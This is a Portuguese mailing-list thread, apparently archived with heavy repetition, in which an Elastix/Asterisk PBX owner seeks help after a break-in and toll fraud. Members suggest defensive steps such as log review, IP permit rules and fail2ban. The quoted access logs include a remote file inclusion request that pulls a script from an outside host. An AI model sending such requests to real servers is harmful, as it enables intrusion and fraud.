asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Depois da senha estes procedimentos que o amigo postou ai (nível de rede) > são os mais críticos e elimina mais de 90% dos problemas de segurança, de > resto só fica a confiança no código do asterisk (nível de aplicação). > > > =D > > > Em 22 de novembro de 2010 17:03, Rodrigo Vian < > lis...@porttaltecnologia.com.br> escreveu: > > seus ramais possuem ip fixo > > podes utilizar os parâmetros: > > deny=0.0.0.0/0.0.0.0 > permit=222.111.222.1/255.255.255.255 > > Com esses parâmetros você somente vai permitir login a partir do ip > especificado... > > Se tiver controle de firewall, pode utilizar fail2ban... > > Abs > > > Mensagem original > *De*: Gleidison Sampaio > > > > *Responder a*: asteriskbrasil@listas.asteriskbrasil.org > *Para*: alejandrorflo...@gmail.com > *Cc*: Asterisk Lista > > > > *Assunto*: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > *Data*: Mon, 22 Nov 2010 15:49:04 -0400 > > > Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais > de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de > reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com > caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para > aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa > maquina em outro IP com uma faixa bem diferente. > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' failed for > '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] > chan_sip.c: Registration from '"3450595069" Asterisk>' failed for '184.106.132.239' - No matching peer found [Nov 20 > 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' failed for > '184.106.132.239' - No matching peer found > > > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > > > Date: Mon, 22 Nov 2010 16:33:22 -0300 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > From: alejandrorflo...@gmail.com >
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Depois da senha estes procedimentos que o amigo postou ai (nível de rede) são os mais críticos e elimina mais de 90% dos problemas de segurança, de resto só fica a confiança no código do asterisk (nível de aplicação). =D Em 22 de novembro de 2010 17:03, Rodrigo Vian < lis...@porttaltecnologia.com.br> escreveu: > seus ramais possuem ip fixo > > podes utilizar os parâmetros: > > deny=0.0.0.0/0.0.0.0 > permit=222.111.222.1/255.255.255.255 > > Com esses parâmetros você somente vai permitir login a partir do ip > especificado... > > Se tiver controle de firewall, pode utilizar fail2ban... > > Abs > > > Mensagem original > *De*: Gleidison Sampaio > > > > *Responder a*: asteriskbrasil@listas.asteriskbrasil.org > *Para*: alejandrorflo...@gmail.com > *Cc*: Asterisk Lista > > > > *Assunto*: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > *Data*: Mon, 22 Nov 2010 15:49:04 -0400 > > > Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais > de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de > reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com > caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para > aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa > maquina em outro IP com uma faixa bem diferente. > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' failed for > '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] > chan_sip.c: Registration from '"3450595069" Asterisk>' failed for '184.106.132.239' - No matching peer found [Nov 20 > 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' failed for > '184.106.132.239' - No matching peer found > > > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > > > Date: Mon, 22 Nov 2010 16:33:22 -0300 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > From: alejandrorflo...@gmail.com > > To: gleidison.samp...@hotmail.com > > CC: asteriskbrasil@listas.asteriskbrasil.org > > > > Opa, > > > > > > > Alejandro, > > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde > verifico > > > o log dos ramais, tipo o IP Publico que cada ramal se logou. > > > > Os logs do asterisk ficam em: > > /var/log/asterisk/full > > > > Verifica nesse arquivo. > > Outra coisa é via console do asterisk executar o comando: sip show peers > > que vai te mostrar que ramais estão online e qual ip de origem. > > > > > > -- > > Abraço, > > Alejandro Flores > > http://www.triforsec.com.br/ > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões > asteriskbrasil.orgasteriskbra...@listas.asteriskbrasil.orghttp://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > _
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original De: Gleidison Sampaio Responder a: asteriskbrasil@listas.asteriskbrasil.org Para: alejandrorflo...@gmail.com Cc: Asterisk Lista Assunto: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Data: Mon, 22 Nov 2010 15:49:04 -0400 Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio > Date: Mon, 22 Nov 2010 16:33:22 -0300 > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > From: alejandrorflo...@gmail.com > To: gleidison.samp...@hotmail.com > CC: asteriskbrasil@listas.asteriskbrasil.org > > Opa, > > > > Alejandro, > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico > > o log dos ramais, tipo o IP Publico que cada ramal se logou. > > Os logs do asterisk ficam em: > /var/log/asterisk/full > > Verifica nesse arquivo. > Outra coisa é via console do asterisk executar o comando: sip show peers > que vai te mostrar que ramais estão online e qual ip de origem. > > > -- > Abraço, > Alejandro Flores > http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found[Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio > Date: Mon, 22 Nov 2010 16:33:22 -0300 > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > From: alejandrorflo...@gmail.com > To: gleidison.samp...@hotmail.com > CC: asteriskbrasil@listas.asteriskbrasil.org > > Opa, > > > > Alejandro, > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico > > o log dos ramais, tipo o IP Publico que cada ramal se logou. > > Os logs do asterisk ficam em: > /var/log/asterisk/full > > Verifica nesse arquivo. > Outra coisa é via console do asterisk executar o comando: sip show peers > que vai te mostrar que ramais estão online e qual ip de origem. > > > -- > Abraço, > Alejandro Flores > http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Opa, > Alejandro, > Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico > o log dos ramais, tipo o IP Publico que cada ramal se logou. Os logs do asterisk ficam em: /var/log/asterisk/full Verifica nesse arquivo. Outra coisa é via console do asterisk executar o comando: sip show peers que vai te mostrar que ramais estão online e qual ip de origem. -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou. Att; Gleidison C. Sampaio > Date: Mon, 22 Nov 2010 15:39:10 -0300 > From: alejandrorflo...@gmail.com > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > >> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > >> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > >> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > >> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > >> HTTP/1.1" > >> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > Na verdade na verdade esses logs só mostram um robozinho de scanner de > vulnerabilidades. Esses logs só mostram os caras procurando furo, > porém, não tem. Encontrei entradas iguais nos logs dos meus servers, > mas é só isso mesmo, algum manezão investigando tua máquina. Nesse > caso, claro. > Procure por aquivos estranhos no /tmp no /var/tmp, procure por > processos estranhos no caso de uma invasão. > No caso das ligações pra itália que você falou, eles ligaram > autenticados ou anonimos? > > -- > Abraço, > Alejandro Flores > http://www.triforsec.com.br/ > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
>> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs >> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" >> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET >> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" >> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Na verdade na verdade esses logs só mostram um robozinho de scanner de vulnerabilidades. Esses logs só mostram os caras procurando furo, porém, não tem. Encontrei entradas iguais nos logs dos meus servers, mas é só isso mesmo, algum manezão investigando tua máquina. Nesse caso, claro. Procure por aquivos estranhos no /tmp no /var/tmp, procure por processos estranhos no caso de uma invasão. No caso das ligações pra itália que você falou, eles ligaram autenticados ou anonimos? -- Abraço, Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Para vc pesquisar isto que foi usado em vc, foi um SHELLCODE. Em 22 de novembro de 2010 15:00, Alejandro Flores < alejandrorflo...@gmail.com> escreveu: > Gleidison, > > > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de > ligaçoes > > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" > > 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > Você instalou algo mais no seu elastix? Ele faz referência a pastas > que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo > que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso, > estava com falhas de segurança. > Nessa segunda linha do log ele se certifica de que o servidor está > 'vulnerável' e depois disso você ta frito. > > > -- > Abraço! > Alejandro Flores > http://www.triforsec.com.br/ > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo) ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Gleidison, > Sidinei, > Obrigado pela Resposta, > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > /var/log/httpd/access_log > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" > 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Você instalou algo mais no seu elastix? Ele faz referência a pastas que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso, estava com falhas de segurança. Nessa segunda linha do log ele se certifica de que o servidor está 'vulnerável' e depois disso você ta frito. -- Abraço! Alejandro Flores http://www.triforsec.com.br/ ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Não sou a melhor pessoa para lhe responder sobre segurança no asterisk, porém tenho muitos conceitos de políticas de segurança, uma delas vc já até disse, limitar número de conexões/canais/chamadas, tem sim, uma leitura vc encontrará muitas formas de blindar o servidor. Porém nada adianta se vc tem senhas fracas. Em 22 de novembro de 2010 14:25, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > é possivel limitar a quantidade de ligaçoes simultaneas por ramal? > > > > Att; > > *Gleidison C. Sampaio* > > > -- > From: gleidison.samp...@hotmail.com > > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 13:23:47 -0400 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Nielsen, > > Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi > facil, até porque só tem uma maquina em cada filial, nao detectei nada, até > porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é > que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra > evitar essas invasões. > > > > Att; > > *Gleidison C. Sampaio* > > > > -- > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 13:51:04 -0300 > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? > provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito > estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes > esteja com trojan, este enviou as informações e no meio delas foram os dados > de autenticação. > > Pensou nisso tudo ? > > No final das contas é preciso a auditoria para identificar a origem da > invasão. > > Em 22 de novembro de 2010 13:40, Gleidison Sampaio < > gleidison.samp...@hotmail.com> escreveu: > > Sim no Elastix 1.6 > > ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com > IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais > estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o > que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas > durante a madrugada os caras arrebentaram de ligar. > > > > > > > > > > 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 > > > > > > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > -- > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 13:27:16 -0300 > > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > > Opa, foi no seu ELASTIX 1.6? > > Qual a posição que se encontra seu servidor voip na sua rede ? > > Em 22 de novembro de 2010 13:20, Gleidison Sampaio < > gleidison.samp...@hotmail.com> escreveu: > > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > -- > From: sidnei...@ig.com.br > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 14:00:10 -0200 > Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Não, pois estão todas as linhas comentadas (é só um exemplo). > > *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: > asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison > Sampaio > *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 > *Para:* Asterisk Lista > *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 > > Boa tarde Lista! > > hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, > e gostaria de saber se isso da permissao a algum acesso no meu servidor > > /etc/asterisk/users.conf > > ;[6000] > ;fullname = Joe User > ;email = j...@foo.bar > ;secret = > ;zapchan = 1 > ;hasvoicemail = yes > ;vms
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
é possivel limitar a quantidade de ligaçoes simultaneas por ramal? Att; Gleidison C. Sampaio From: gleidison.samp...@hotmail.com To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 13:23:47 -0400 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org 